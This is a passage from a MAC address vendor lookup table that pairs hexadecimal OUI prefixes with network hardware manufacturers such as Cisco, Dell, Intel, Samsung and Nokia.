Mfg. +000907 Chrysalis Development +000900 TMT +0008F8 UTC CCS +0008F3 Wany +0008EC Optical Zonu +0008E0 ATO Technology +0008E5 IDK +000945 Palmmicro Communications +00093E C&I Technologies +000932 Omnilux +000939 ShibaSoku +000926 Yoda Communications +00092B iQstor Networks +00092C Hitpoint +00091F A&D +000751 m-u-t AG +000750 Cisco Systems +000746 Turck +00074A Carl Valentin GmbH +00073A Inventel Systemes +000734 ONStor +000739 Scotty Group Austria Gmbh +00072D CNSystems +000727 Zi (HK) +000717 Wieland Electric GmbH +00071E Tri-M Engineering / Nupak Dev. +000723 Elcon Systemtechnik Gmbh +00071D Satelsa Sistemas Y Aplicaciones De Telecomunicaciones +000632 Mesco Engineering GmbH +000625 The Linksys Group +00062C Bivio Networks +000624 Gentner Communications +00061B Notebook Development Lab. Lenovo Japan +000622 Chung Fu Chen Yeh Enterprise +00061C Hoshino Metal Industries +000621 Hinox +00060B Artesyn Embedded Technologies +000611 Zeus Wireless +000615 Kimoto Electric +000605 Inncom International +0005E3 LightSand Communications +0005EF Adoir Digital Technology +0005F6 Young Chang +0005E9 Unicess Network +0005F0 Satec +0005FC Schenck Pegasus +0005E0 Empirix +0005D6 L-3 Linkabit +0005C4 Telect +0005D0 Solinet Systems +0005CA Hitron Technology +0005BD Roax BV +0005BE Kongsberg Seatex AS +0005C3 Pacific Instruments +00059D Daniel Computing Systems +000796 LSI Systems +000790 Tri-M Technologies (s) Limited +000784 Cisco Systems +000789 Dongwon Systems +000783 SynCom Network +00078A Mentor Data System +00077A Infoware System +00076D Flexlight Networks +000769 Italiana Macchi SpA +000773 Ascom Powerline Communications +00075D Celleritas +000763 Sunniwell Cyber Tech. +000756 Juyoung Telecom +0007C9 Technol Seven +00047B Schlumberger +0007C3 Thomson +0007BD Radionet +0007B0 Office Details +0007B7 Samurai Ind. Prods Eletronicos Ltda +0007B6 Telecom Technology +0007A3 Ositis Software +0007A9 Novasonics +0007AC Eolring +00079C Golden Electronics Technology +0006AB W-Link Systems +0006A5 Pinon +0006A1 Celsian Technologies +000694 Mobillian +00069B AVT Audio Video Technologies GmbH +00068E HID +000688 Telways Communication +000682 Convedia +000681 Goepel Electronic GmbH +000655 Yipee +00D05F Valcom +000674 Spectrum Control +000661 NIA Home Technologies +000668 Vicon Industries +000667 Tripp Lite +00066E Delta Electronics +00064E Broad Net Technology +00064F Pro-nets Technology +000642 Genetel Systems +00063E Opthos +000648 Seedsware +000638 Sungjin C&C +00070B Novabase SGPS +000710 Adax +000700 Zettamedia Korea +0006F9 Mitsui Zosen Systems Research +000703 Csee Transport +000706 Sanritz +0006E8 Optical Network Testing +0006EE Shenyang Neu-era Information & Technology Stock +0006E2 Ceemax Technology +0006D8 Maple Optical Systems +0006D4 Interactive Objects +0006CE Dateno +0006B7 Telem Gmbh +0006BE Baumer Optronic GmbH +0006B8 Bandspeed +0006BD Bntechnology +0006C2 Smartmatic +0006C7 Rfnet Technologies Pte (S) +0006B1 Sonicwall +000475 3 Com +00046F Digitel S/A Industria Eletronica +000468 Vivity +00045C Mobiwave Pte +000463 Bosch Security Systems +000462 Dakos Data & Communication +000455 Antara.net +000456 Cambium Networks Limited +000450 DMD Computers SRL +000446 Cyzentech +00044B Nvidia +0005AD Topspin Communications +0005B1 ASB Technology BV +0005B7 Arbor Technology +0005A3 QEI +000597 Eagle Traffic Control Systems +000591 Active Silicon +00058A Netcom +000590 Swissvoice +00057E Eckelmann Steuerungstechnik GmbH +000578 Private +000584 AbsoluteValue Systems +00052E Cinta Networks +00053A Willowglen Services Pte +000528 New Focus +000527 SJ Tek +000521 Control Microsystems +000515 Nuark +00051B Magic Control Technology +000511 Complementary Technologies +00050B Sicom Systems +000501 Cisco Systems +000505 Systems Integration Solutions +000504 Naray Information & Communication Enterprise +0004FB Commtech +000574 Cisco Systems +000567 Etymonic Design +00056E National Enhance Technology +00056D Pacific +000561 nac Image Technology +00055B Charles Industries +000554 Rangestar Wireless +000555 Japan Cash Machine +000547 Starent Networks +00054E Philips +000540 Fast +000541 Advanced Systems +000534 Northstar Engineering +0004F4 Infinite Electronics +0004EE Lincoln Electric Company +0004E8 IER +008086 Computer Generation +0004DE Cisco Systems +0004E4 Daeryung Ind. +0004D7 Omitec Instrumentation +0004D8 IPWireless +0004D2 Adcon Telemetry GmbH +0004D1 Drew Technologies +0004CB Tdsoft Communication +0004C5 ASE Technologies +00043F ESTeem Wireless Modems +000439 Rosco Entertainment Technology +000433 Cyberboard A/S +00042C Minet +000427 Cisco Systems +000426 Autosys +000420 Slim Devices +000413 Snom Technology AG +000418 TeltronicU. +000412 WaveSmith Networks +00040C Kanno Works +000370 NXTV +000405 ACN Technologies +000406 Fa. Metabox AG +0003FB Enegate +0003FC Intertex Data AB +0003EF Oneline AG +0003F6 Allegro Networks +0003EA Mega System Technologies +0003E9 Akara Canada +0003E4 Cisco Systems +0003D8 iMPath Networks +0003D5 Advanced Communications +0003CC Momentum Computer +0003D1 Takaya +0003C5 Mobotix AG +0003BE Netility +0003B9 Hualong Telecom +0003B7 Zaccess Systems +0003B3 IA Link Systems +0003A7 Unixtar Technology +0003AE Allied Advanced Manufacturing Pte +0003A0 Cisco Systems +000398 Wisi +00039B NetChip Technology +000394 Connect One +00038D PCS Revenue Control Systems +000385 Actelis Networks +000388 Fastfame Technology +00037F Atheros Communications +0004B8 Kumahira +0004B2 Essegi SRL +0004AE Sullair +0004AB Comverse Network Systems +00049F Freescale Semiconductor +0004A4 NetEnabled +00049E Wirelink +000498 Mahi Networks +000491 Technovision +00048C Nayna Networks +000492 Hive Internet +000485 PicoLight +000307 Secure Works +000300 Barracuda Networks +0002F8 Seakr Engineering +00D024 Cognex +0002F4 Pctel +0002FB Baumuller Aulugen-Systemtechnik GmbH +0002E9 CS Systemes De Securite - C3S +0002DD Bromax Communications +0002E2 NDC Infared Engineering +0002DA ExiO Communications +0002D6 Nice Systems +0002CA EndPoints +0002CF ZyGate Communications +0001CD ARtem +0001D2 inXtron +0001C9 Cisco Systems +0001C7 Cisco Systems +0001C2 ARK Research +0001BE Gigalink +0001BC Brains +0001AC Sitara Networks +0001A9 BMW AG +0001B0 Fulltek Technology +000179 Wireless Technology +000185 Hitachi Aloka Medical +00018C Mega Vision +000192 Texas Digital Systems +00019E ESS Technology +001095 Thomson +00025A Catena Networks +000271 Zhone Technologies +00026C Philips CFT +00026A Cocess Telecom +000266 Thermalogic +00025F Nortel Networks +000256 Alpha Processor +000251 Soma Networks +00024A Cisco Systems +00024D Mannesman Dematic Colby +000245 Lampus +00023E Selta Telematica S.p.a +00023B Ericsson +000237 Cosmo Research +000234 Imperial Technology +000228 Necsom +000224 C-cor +00020D Micronpc.com +000220 Canon Finetech +000378 Humax +00036C Cisco Systems +000373 Aselsan A.S +000368 Embedone +000366 ASM Pacific Technology +000365 Kira Information & Communications +000360 PAC Interactive Technology +00035D Bosung Hi-Net +00031A Beijing Broad Telecom +000359 DigitalSis +000354 Fiber Logic Communications +000352 Colubris Networks +00034E Pos Data Company +0002C3 Arelnet +0002BE Totsu Engineering +0002BA Cisco Systems +0002B2 Cablevision +0002B5 Avnet +0002AE Scannex Electronics +0002A7 Vivace Networks +0002A2 Hilscher GmbH +000297 C-COR.net +00028E Rapid 5 Networks +000293 Solid Data Systems +0001FA Horoscas +000284 Areva T&D +00027D Cisco Systems +00033F BigBand Networks +000336 Zetes Technologies +00033B Tami Tech +000328 Mace Group +00032F Global Sun Technology +000320 Xpeed +000323 Cornet Technology +00029F L-3 Communication Aviation Recorders +00031F Condev +000317 Merlin Systems +00030E Core Communications +000313 Access Media SPA +0001A5 Nextcomm +0001A1 Mag-Tek +000195 Sena Technologies +00017D ThermoQuest +000189 Refraction Technology +00308B Brix Networks +00015A Digital Video Broadcasting +000166 TC Group A/S +00015F Digital Design Gmbh +000214 Dtvro +000210 Fenecom +000208 Unify Networks +000201 IFM Electronic gmbh +0001F5 Erim +0001FD Digital Voice Systems +0001E5 Supernet +0001E8 Force10 Networks +0001D9 Sigma +0001E0 Fast Systems +0001D5 Haedong Info & Comm +000118 EZ Digital +000124 Acer Incorporated +000101 Private +000114 Kanda Tsushin Kogyo +000111 iDigm +000105 Beckhoff Automation GmbH +00029C 3com +00B009 Grass Valley, A Belden Brand +00B09D Point Grey Research +00B094 Alaris +00B048 Marconi Communications +00B0C7 Tellabs Operations +003060 Powerfile +00301C Altvater Airdata Systems +003015 CP Clare +0030E6 Draeger Medical Systems +003091 Taiwan First Line ELEC. +003080 Cisco Systems +0030AD Shanghai Communication +00305B Toko +003024 Cisco Systems +00301F Optical Networks +0030D9 Datacore Software +00D0FF Cisco Systems +003058 API Motion +0030C6 Control Solutions +003036 RMP Elektroniksysteme Gmbh +00308A Nicotra Sistemi S.P.A +00302C Sylantro Systems +003006 Superpower Computer +003079 CQOS +003059 Kontron Compact Computers AG +0030B9 Ectel +00303A Maatel +0030A3 Cisco Systems +003040 Cisco Systems +003064 Adlink Technology +003097 AB Regin +0030EB Turbonet Communications +0030C8 GAD LINE +0030C9 LuxN +00B01E Rantic Labs +00B064 Cisco Systems +0030A2 Lightner Engineering +0030DE Wago Kontakttechnik Gmbh +00309E Workbit +003057 QTelNet +00305C Smar Laboratories +003082 Taihan Electric Wire +0030AE Times N System +00300D MMC Technology +003075 Adtech +0030E7 CNF Mobile Solutions +003019 Cisco Systems +003052 Elastic Networks +003011 HMS Industrial Networks +00304A Fraunhofer Ipms +003014 Divio +003029 Opicom +0030BD Belkin Components +0030BA Ac&t System +00301D Skystream +003049 Bryant Technology +003041 Saejin T & M +00308C Quantum +00D04F Bitronics +00D0EF IGT +00D022 Incredible Technologies +00D0C8 Prevas A/S +00D052 Ascend Communications +00D0B1 Omega Electronics SA +00D0C1 Harmonic Data Systems +00D0F0 Convision Technology Gmbh +00D00E Pluris +00D055 Kathrein-werke KG +00D000 Ferran Scientific +00D005 ZHS Zeitmanagementsysteme +00D019 Dainippon Screen Corporate +00D053 Connected Systems +00D097 Cisco Systems +00016A Alitec +000176 Orient Silver Enterprises +000158 Electro Industries/Gauge Tech +00012D Komodo Technology +000139 Point Multimedia Systems +000140 Sendtek +00014C Berkeley Process Control +000135 KDC +00013C TIW Systems +000148 X-traWeb +000120 Oscilloquartz +000127 Open Networks +00309C Timing Applications +003086 Transistor Devices +0030B5 Tadiran Microwave Networks +003070 1Net +003044 CradlePoint +00307E Redflex Communication Systems +00307A Advanced Technology & Systems +0030B7 Teletrol Systems +0030B3 San Valley Systems +00303B PowerCom Technology +0030BC Optronic AG +003071 Cisco Systems +009003 Aplio +0090D7 NetBoost +009093 Nanao +0090B4 Willowbrook Technologies +009083 Turbo Communication +0090BD Omnia Communications +009094 Osprey Technologies +0090DD Miharu Communications +009028 Nippon Signal +00908C Etrend Electronics +00905D Netcom Sicherheitstechnik Gmbh +009068 DVT +009030 Honeywell-dating +0090D3 Giesecke & Devrient Gmbh +005081 Murata Machinery +0050CB Jetter +00500E Chromatis Networks +0050FD Visioncomm +0050FE Pctvnet ASA +0050AB Naltec +005006 TAC AB +0050BF Metalligence Technology +005089 Safety Management Systems +005066 AtecoM GmbH advanced telecomunication modules +0050D9 Engetron-engenharia Eletronica IND. e COM. Ltda +005043 Marvell Semiconductor +005018 AMIT +005059 iBAHN +00506A Edeva +00502E Cambex +005070 Chaintech Computer +00503B Mediafire +005084 ATL Products +005055 Doms A/S +00504B Barconet N.V. +005046 Menicx International +00502C Soyo Computer +005060 Tandberg Telecom AS +0050DD Serra Soldadura +00503F Anchor Games +0050EE TEK Digitel +005004 3com +005072 Corvis +005012 CBL - Gmbh +0050E8 Nomadix +0050F2 Microsoft +005052 Tiara Networks +005064 CAE Electronics +0050B4 Satchwell Control Systems +0050B2 Brodel Gmbh +00D081 RTD Embedded Technologies +00D011 Prism Video +00D09B Spectel +00D031 Industrial Logic +00D021 Regent Electronics +00D0DF Kuzumi Electronics +00D0B4 Katsujima +00D079 Cisco Systems +00D0E2 MRT Micro +00D039 Utilicom +00504F Olencom Electronics +0050A0 Delta Computer Systems +005007 Siemens Telecommunication Systems Limited +005015 Bright Star Engineering +005031 Aeroflex Laboratories +0050DF AirFiber +0050F3 Global NET Information +005038 Dain Telecom +00D0E1 Avionitek Israel +00D01B Mimaki Engineering +00D06E Trendview Recorders +00D075 Alaris Medical Systems +00509D THE Industree +00501E Grass Valley, A Belden Brand +00502B Genrad +00500A Iris Technologies +00D027 Applied Automation +00D0F1 Sega Enterprises +00D009 Hsing TECH. Enterprise +00D080 Exabyte +00D084 Nexcomm Systems +00D0E6 Ibond +00D099 Elcard Wireless Systems Oy +0090AF J. Morita MFG. +009088 Baxall Security +0090E0 Systran +00903E N.V. Philips Industrial Activities +0090B9 Beran Instruments +00901A Unisphere Solutions +009082 Force Institute +00906A Turnstone Systems +0001FE Digital Equipment +009077 Advanced Fibre Communications +0090B2 Avici Systems +009095 Universal Avionics +009012 Globespan Semiconductor +0090B6 Fibex Systems +0090F4 Lightning Instrumentation +00904F ABB Power T&D Company +00905A Dearborn Group +009066 Troika Networks +00907A Spectralink +0090F0 Harmonic Video Systems +001047 Echo Eletric +00100C ITO +0010D0 Witcom +001006 Thales Contact Solutions +0010D6 Exelis +001076 Eurem Gmbh +00103F Tollgrade Communications +001034 GNP Computers +001012 Processor Systems (I) PVT +0010C8 Communications Electronics Security Group +0010D1 Top Layer Networks +0010F0 Rittal-werk Rudolf LOH Gmbh & +00106A Digital Microwave +001030 Eion +0010A4 Xircom +001050 Rion +00109C M-system +001064 DNPG +001020 Hand Held Products +00106E Tadiran COM. +00105B NET Insight AB +001002 Actia +0010A0 Innovex Technologies +001074 Aten International +001057 Rebel.com +0010BC Aastra Telecom +001033 Accesslan Communications +0004AC IBM +0010B4 Atmosphere Networks +0010F9 Unique Systems +001038 Micro Research Institute +00100A Williams Communications Group +001080 Metawave Communications +0010AB Koito Electric Industries +00903C Atlantic Network Systems +0090CE Tetra Gmbh +0090E3 Avex Electronics +00900B Lanner Electronics +0090C8 Waverider Communications (canada) +0090B7 Digital Lightwave +009037 Acucomm +009059 Telecom Device K.K. +00E003 Nokia Wireless Business Commun +00E0F3 WebSprint Communications +00E013 Eastern Electronic +001063 Starguide Digital Networks +0010A7 Unex Technology +001039 Vectron Systems AG +0010C3 Csi-control Systems +00107F Crestron Electronics +00102C Lasat Networks A/S +0010B7 Coyote Technologies +006064 Netcomm Limited +0060CB Hitachi Zosen +006090 Artiza Networks +0060A9 Gesytec MBH +0060F2 Lasergraphics +006031 HRK Systems +0060A6 Particle Measuring Systems +006082 Novalink Technologies +006012 Power Computing +00604D MMC Networks +0060E5 Fuji Automation +006010 Network Machines +006044 Litton/poly-scientific +0060BE Webtronics +006052 Peripherals Enterprise +00E03F Jaton +00E0EB Digicom Systems, Incorporated +00E00E Avalon Imaging Systems +00E0CD Saab Sensis +00E0CB Reson +00E048 SDL Communications +00E083 Jato Technologies +00E03D Focon Electronic Systems A/S +00E0FA TRL Technology +00E02C AST Computer +00E00B Rooftop Communications +00E067 eac Automation-consulting Gmbh +00E058 Phase ONE Denmark A/S +00E089 ION Networks +00E03B Prominet +006017 Tokimec +0060E6 Shomiti Systems Incorporated +006053 Toyoda Machine Works +0060A0 Switched Network Technologies +006019 Roche Diagnostics +006033 Acuity Imaging +0060EE Apollo +006022 Vicom Systems +006013 Netstal Maschinen AG +0060F4 Advanced Computer Solutions +006011 Crystal Semiconductor +00600E Wavenet International +0060C0 Nera Networks AS +00E062 Host Engineering +00E033 E.E.P.D. GmbH +00E079 A.t.n.r. +00E09C MII +00E075 Verilink +00E07A Mikrodidakt AB +00E03E Alfatech +00E09A Positron +0060D7 Ecole Polytechnique Federale DE Lausanne (epfl) +006087 Kansai Electric +00E029 Standard Microsystems +00606B Synclayer +006073 Redcreek Communications +006039 SanCom Technology +0060A5 Performance Telecom +0060B3 Z-com +006089 Xata +00603C Hagiwara Sys-com +00602E Cyclades +006075 Pentek +00601C Telxon +006016 Clariion +0060AD MegaChips +0060B6 Land Computer +006055 Cornell University +006015 Net2net +00A01D Red Lion Controls +00A071 Video Lottery Technologies +00A052 Stanilite Electronics +00A0EA Ethercom +00A02E Brand Communications +00A0E2 Keisokugiken +00A058 Glory +00E093 Ackfin Networks +00E0E3 Sk-elektronik Gmbh +00E066 ProMax Systems +00E0DB ViaVideo Communications +00E0DF Keymile Gmbh +00E00D Radiant Systems +00E008 Amazing Controls! +00E086 Emerson Network Power, Avocent Division +00E0E1 G2 Networks +00E042 Pacom Systems +00E08E Utstarcom +00E095 Advanced-vision Technolgies +006006 Sotec +00603D 3CX +006029 Cary Peripherals +006043 iDirect +0060D1 Cascade Communications +0060CD VideoServer +006094 IBM +0060D9 Transys Networks +0060AA Intelligent Devices (idi) +00605A Celcore +006065 Bernecker & Rainer Industrie-elektronic Gmbh +00E07B BAY Networks +00E077 Webgear +00E0D2 Versanet Communications +00E04E Sanyo Denki +00E0D0 Netspeed +00E02A Tandberg Television AS +00E05B West END Systems +00E051 Talx +00A0F0 Toronto Microelectronics +00A049 Digitech Industries +00A027 Firepower Systems +00A0FF Tellabs Operations +00A001 DRS Signal Solutions +00A0F1 MTI +00A046 Scitex +00A0D9 Convex Computer +00A0B5 3H Technology +00A0AC Gilat Satellite Networks +00A057 Lancom Systems Gmbh +00A086 Amber Wave Systems +00A083 Asimmphony Turkey +00A091 Applicom International +00A004 Netpower +00A081 Alcatel Data Networks +00A0D5 Sierra Wireless +00200F Ebrains +0020C7 Akai Professional M.I. +0020EB Cincinnati Microwave +0020E3 MCD Kencom +002013 Diversified Technology +0020C1 SAXA +002087 Memotec +0020F9 Paralink Networks +00A0F9 Bintec Communications Gmbh +00A0BC Viasat, Incorporated +00A003 Siemens Switzerland, I B T HVP +00A09E Ictv +00A026 Teldat +00201A MRV Communications +002023 T.C. Technologies +0020F3 Raynet +002039 Scinets +002038 VME Microsystems International +00203E LogiCan Technologies +002055 Altech +0020D9 Panasonic Technologies,/mieco-us +002080 Synergy (uk) +002026 Amkly Systems +00203D Honeywell ECC +002019 Ohler Gmbh +002057 Titze Datentechnik Gmbh +0020BE LAN Access +002022 NMS Communications +0020AA Ericsson Television Limited +00208E Chevin Software ENG. +00203B Wisdm +002044 Genitech +0020F5 Pandatel AG +002021 Algorithms Software PVT. +002074 Sungwoon Systems +0020CE Logical Design Group +002082 Oneac +0020BF Aehr Test Systems +0020F1 Altos India Limited +00205D Nanomatic OY +0020E1 Alamar Electronics +0020CC Digital Services +00202C Welltronix +0020B3 Tattile SRL +00A048 Questech +00A0C4 Cristie Electronics +00A089 Xpoint Technologies +00A0D1 Inventec +00A0AE Nucom Systems +00A02B Transitions Research +00A0A1 Epic Data +00A0C3 Unicomputer Gmbh +00A042 Spur Products +00C007 Pinnacle Data Systems +00C0F8 About Computing +00C06F Komatsu +00C08E Network Information Technology +00C05A Semaphore Communications +00C0EB SEH Computertechnik Gmbh +00C0C7 Sparktrum Microsystems +00C0D8 Universal Data Systems +00C068 HME Clear-Com +0040DB Advanced Technical Solutions +00405B Funasset Limited +00401B Printer Systems +0040EB Martin Marietta +0040CD Tera Microsystems +0040E5 Sybus +0040F9 Combinet +004039 Optec Daiichi Denko +0040FE Symplex Communications +0020F0 Universal Microelectronics +0020EF USC +002016 Showa Electric Wire & Cable +00201F Best Power Technology +002045 ION Networks +0020B6 Agile Networks +00208A Sonix Communications +00204C Mitron Computer PTE +002002 Seritech Enterprise +00204B Autocomputer +0020AF 3com +002048 Marconi Communications +002008 Cable & Computer Technology +00C023 Tutankhamon Electronics +00C0F3 Network Communications +00C043 Stratacom +00C0B3 Comstat Datacomm +00C0B5 Corporate Network Systems +00403E Raster OPS +0040AE Delta Controls +0040C6 Fibernet Research +004092 ASP Computer Products +004054 Connection Machines Services +0040D8 Ocean Office Automation +0040C0 Vista Controls +004088 Mobius Technologies +00803B APT Communications +0080BA Specialix (asia) PTE +00BB01 Octothorpe +00C01F S.e.r.c.e.l. +00C094 VMX +00C075 Xante +00C0F9 Artesyn Embedded Technologies +00C039 Teridian Semiconductor +00C077 Daewoo Telecom +00C02F Okuma +00C0F1 Shinko Electric +00C0DE Zcomm +0040AF Digital Products +00404F Space & Naval Warfare Systems +00407B Scientific Atlanta +00404E Fluent +00C0F7 Engage Communication +00C030 Integrated Engineering B. V. +00C04A Group 2000 AG +00C0A6 Exicom Australia +00C053 Aspect Software +00C0CF Imatran Voima OY +00C029 Nexans Deutschland GmbH - ANS +00C0A4 Unigraf OY +00C060 ID Scandinavia AS +00C082 Moore Products +00C008 Seco SRL +00C0BB Forval Creative +00C0E0 DSC Communication +00C05E Vari-lite +00C031 Design Research Systems +00C07C Hightech Information +00C0AE Towercom DBA PC House +00C0D6 J1 Systems +00C0AA Silicon Valley Computer +00C04E Comtrol +00C00A Micro Craft +00C02A Ohkura Electric +00C0F2 Transition Networks +00C01D Grand Junction Networks +00C0AD Marben Communication Systems +00C024 Eden Sistemas DE Computacao SA +00C0E9 OAK Solutions +00C0C5 SID Informatica +00C001 Diatek Patient Managment +00C07E Kubota Electronic +008012 Integrated Measurement Systems +008039 Alcatel STC Australia +008023 Integrated Business Networks +0080CA Netcom Research Incorporated +00804D Cyclone Microsystems +0080D6 Nuvotech +0080ED IQ Technologies +0080C1 Lanex +008049 Nissin Electric +00807C Fibercom +008079 Microbus Designs +0080DE Gipsi +008004 Antlow Communications +008078 Practical Peripherals +008040 John Fluke Manufacturing +0000F8 Digital Equipment +0080CE Broadcast Television Systems +00801A Bell Atlantic +00803F Tatung Company +0080D4 Chase Research +0080CB Falco Data Products +008075 Parsytec Gmbh +0080EB Compcontrol +008099 Eaton Industries GmbH +0080E4 Northwest Digital Systems +008041 VEB Kombinat Robotron +0080C8 D-link Systems +008036 Reflex Manufacturing Systems +0040F0 MicroBrain +0040A7 Itautec Philco +0040D3 Kimpsion International +004065 GTE Spacenet +0040CB Lanwan Technologies +004041 Fujikura +004053 Ampro Computers +008032 Access +0080CF Embedded Performance +008031 Basys +00803A Varityper +00807E Southern Pacific +008029 Eagle Technology +00802F National Instruments +008051 Fibermux +0080FD Exsceed Corpration +004008 A Plus Info +0040E9 Accord Systems +0040B5 Video Technology Computers +004012 Windata +00401C AST Research +004067 Omnibyte +004035 Opcom +0040EA Plain Tree Systems +0040EF Hypercom +004093 Paxdata Networks +0040EC Mikasa System Engineering +0080B9 Arche Technoligies +0080A7 Honeywell International +0040DA Telspec +004083 TDA Industria DE Produtos +0040C8 Milan Technology +0040BC Algorithmics +00402F Xlnt Designs +00405D Star-tek +00405F AFE Computers +004043 Nokia Siemens Networks GmbH & KG. +00800D Vosswinkel F.U. +0080D1 Kimtron +00805D Canstar +008094 Alfa Laval Automation AB +008047 In-net +008064 Wyse Technology +0080C5 Novellco DE Mexico +0080AC Imlogix, Division OF Genesys +000052 Intrusion.com +0000BD Mitsubishi Cable Company +000037 Oxford Metrics Limited +00003F Syntrex +08007C Vitalink Communications +080076 PC LAN Technologies +080072 Xerox Univ Grant Program +080068 Ridge Computers +080062 General Dynamics +080057 Evans & Sutherland +000010 Sytek +000033 Egan Machinery Company +000080 Cray Communications A/S +0000FD High Level Hardware +08008C Network Research +080089 Kinetics +080084 Tomen Electronics +00000D Fibronics +00004F Logicraft +000015 Datapoint +0000C7 Arix +00001C Bell Technologies +00001A Advanced Micro Devices +000082 Lectra Systemes SA +0000DA Atex +0000DB British Telecommunications plc +0000C1 Madge +0000F6 Applied Microsystems +080023 Panasonic Communications +080022 NBI +080019 General Electric +08004D Corvus Systems +08003E Codex +080033 Bausch & Lomb +08002F Prime Computer +080032 Tigan Incorporated +08002E Metaphor Computer Systems +0000D2 SBE +00006B Silicon Graphics/mips +0000CC Densan +0000CE Megadata +0000EF KTI +00000F NEXT +0000C6 EON Systems +0000D5 Micrognosis International +000078 Labtam Limited +0000EB Matsushita COMM. IND. +00009C Rolm Mil-spec Computers +000032 Marconi plc +000069 Concord Communications +00008B Infotron +0000BE THE NTI Group +00004C NEC +00003B i Controls +080013 Exxon +02BB01 Octothorpe +0000A6 Network General +00DD06 Ungermann-bass +00DD0B Ungermann-bass +000007 Xerox +080014 Excelan +08000F Mitel +0000D7 Dartmouth College +00DD00 Ungermann-bass +08000A Nestar Systems Incorporated +08001C Kdd-kokusai Debnsin Denwa +02AA3C Olivetti Telecomm SPA (olteco) +08001D Able Communications +080018 Pirelli Focom Networks +080015 STC Business Systems +00DD03 Ungermann-bass +00801F Krupp Atlas Electronik Gmbh +00408E Tattile SRL +00800F Standard Microsystems +080065 Genrad +002275 Belkin International +149182 Belkin International +70106F Hewlett Packard Enterprise +988B5D Sagemcom Broadband SAS +94FEF4 Sagemcom Broadband SAS +C8CD72 Sagemcom Broadband SAS +E8BE81 Sagemcom Broadband SAS +C4282D Embedded Intellect +002348 Sagemcom Broadband SAS +B870F4 Compal Information (kunshan) +000FB0 Compal Electronics +1C7508 Compal Information (kunshan) +3829DD ONvocal +F81897 2Wire +ECF4BB Dell +D067E5 Dell +18A99B Dell +F8DB88 Dell +18FB7B Dell +001495 2Wire +74E6E2 Dell +109836 Dell +44A842 Dell +34E6D7 Dell +000BDB Dell +001143 Dell +00188B Dell +D4BED9 Dell +002650 2Wire +00217C 2Wire +001FB3 2Wire +640F28 2Wire +001AA0 Dell +002170 Dell +0026B9 Dell +A4BADB Dell +001E4F Dell +5CF9DD Dell +907AF1 Wally +28101B MagnaCom +00065B Dell +448723 Hoya Service +806C1B Motorola Mobility, a Lenovo Company +A470D6 Motorola Mobility, a Lenovo Company +001B21 Intel Corporate +001B77 Intel Corporate +18FF0F Intel Corporate +58A839 Intel Corporate +A434D9 Intel Corporate +00215D Intel Corporate +001676 Intel Corporate +984FEE Intel Corporate +E82AEA Intel Corporate +605718 Intel Corporate +C4D987 Intel Corporate +B4B676 Intel Corporate +8C705A Intel Corporate +9C4E36 Intel Corporate +541473 Wingtech Group (HongKongLimited +001C50 TCL Technoly Electronics (Huizhou) +00AA01 Intel +5C36B8 TCL King Electrical Appliances (Huizhou) +009027 Intel +A08869 Intel Corporate +00C2C6 Intel Corporate +B88A60 Intel Corporate +00A0C9 Intel +7C7A91 Intel Corporate +AC7BA1 Intel Corporate +AC7289 Intel Corporate +606C66 Intel Corporate +4C8093 Intel Corporate +BC7737 Intel Corporate +A088B4 Intel Corporate +00270E Intel Corporate +001DE0 Intel Corporate +0024D6 Intel Corporate +D8FC93 Intel Corporate +E8B1FC Intel Corporate +186472 Aruba Networks +00246C Aruba Networks +64D954 Taicang T&W Electronics +74C63B AzureWave Technology +CC1FC4 InVue +A0D37A Intel Corporate +985FD3 Microsoft +00D0AC Commscope +0025D3 AzureWave Technology +742F68 AzureWave Technology +DC85DE AzureWave Technology +E0B9A5 AzureWave Technology +E04136 MitraStar Technology +E0B2F1 Fn-link Technology Limited +0026FC AcSiP Technology +B8616F Accton Technology +0010B5 Accton Technology +00A02F ADB Broadband Italia +6487D7 ADB Broadband Italia +00E098 AboCom +0000B1 Alpha Micro +001577 Allied Telesis +ACE010 Liteon Technology +EC086B TP-Link Technologies +2421AB Sony Mobile Communications AB +6C23B9 Sony Mobile Communications AB +58170C Sony Mobile Communications AB +B8F934 Sony Mobile Communications AB +205476 Sony Mobile Communications AB +303926 Sony Mobile Communications AB +00EB2D Sony Mobile Communications AB +B00594 Liteon Technology +40F02F Liteon Technology +E8617E Liteon Technology +28E347 Liteon Technology +18CF5E Liteon Technology +D0DF9A Liteon Technology +0013A9 Sony +00219E Sony Mobile Communications AB +001E45 Sony Mobile Communications AB +001813 Sony Mobile Communications AB +002163 Askey Computer +E839DF Askey Computer +00138F Asiarock Technology Limited +1C69A5 BlackBerry RTS +003067 Biostar Microtech Int'l +246511 AVM GmbH +002308 Arcadyan Technology +880355 Arcadyan Technology +5CDC96 Arcadyan Technology +D0D04B Huawei Technologies +001D00 Brivo Systems +0010E7 Breezecom +5C9656 AzureWave Technology +7C4CA5 BSkyB +902106 BSkyB +A4C7DE Cambridge Industries(Group) +343759 zte +00402A Canoga Perkins +382DE8 Samsung Electronics +D087E2 Samsung Electronics +205531 Samsung Electronics +5440AD Samsung Electronics +842E27 Samsung Electronics +50F0D3 Samsung Electronics +84119E Samsung Electronics +08ECA9 Samsung Electronics +10D38A Samsung Electronics +382DD1 Samsung Electronics +E0CBEE Samsung Electronics +64B853 Samsung Electronics +F4428F Samsung Electronics +188331 Samsung Electronics +8455A5 Samsung Electronics +A87C01 Samsung Electronics +C01173 Samsung Electronics +BCE63F Samsung Electronics +B857D8 Samsung Electronics +94B10A Samsung Electronics +E458B8 Samsung Electronics +088C2C Samsung Electronics +B86CE8 Samsung Electronics +9C65B0 Samsung Electronics +C8A823 Samsung Electronics +C44202 Samsung Electronics +D059E4 Samsung Electronics +64B310 Samsung Electronics +000B3B devolo AG +001D20 Comtrend +140C76 Freebox SAS +0024D4 Freebox SAS +A089E4 Skyworth Digital Technology(Shenzhen) +001A9A Skyworth Digital Technology(Shenzhen) +AC3A7A Roku +CC6DA0 Roku +000D4B Roku +001999 Fujitsu Technology Solutions GmbH +0009E1 Gemtek Technology +C477AB Beijing ASU Tech +182A7B Nintendo +0024F3 Nintendo +A45C27 Nintendo +001DBC Nintendo +001F32 Nintendo +D8FB5E Askey Computer +544408 Nokia +0017B0 Nokia Danmark A/S +001BEE Nokia Danmark A/S +1886AC Nokia Danmark A/S +0021FE Nokia Danmark A/S +002266 Nokia Danmark A/S +DCB3B4 Honeywell Environmental & Combustion Controls (Tianjin) +C8D10B Nokia +C8979F Nokia +F4F5A5 Nokia +3CC243 Nokia +0015A0 Nokia Danmark A/S +001A16 Nokia Danmark A/S +0022FC Nokia Danmark A/S +002548 Nokia Danmark A/S +001DFD Nokia Danmark A/S 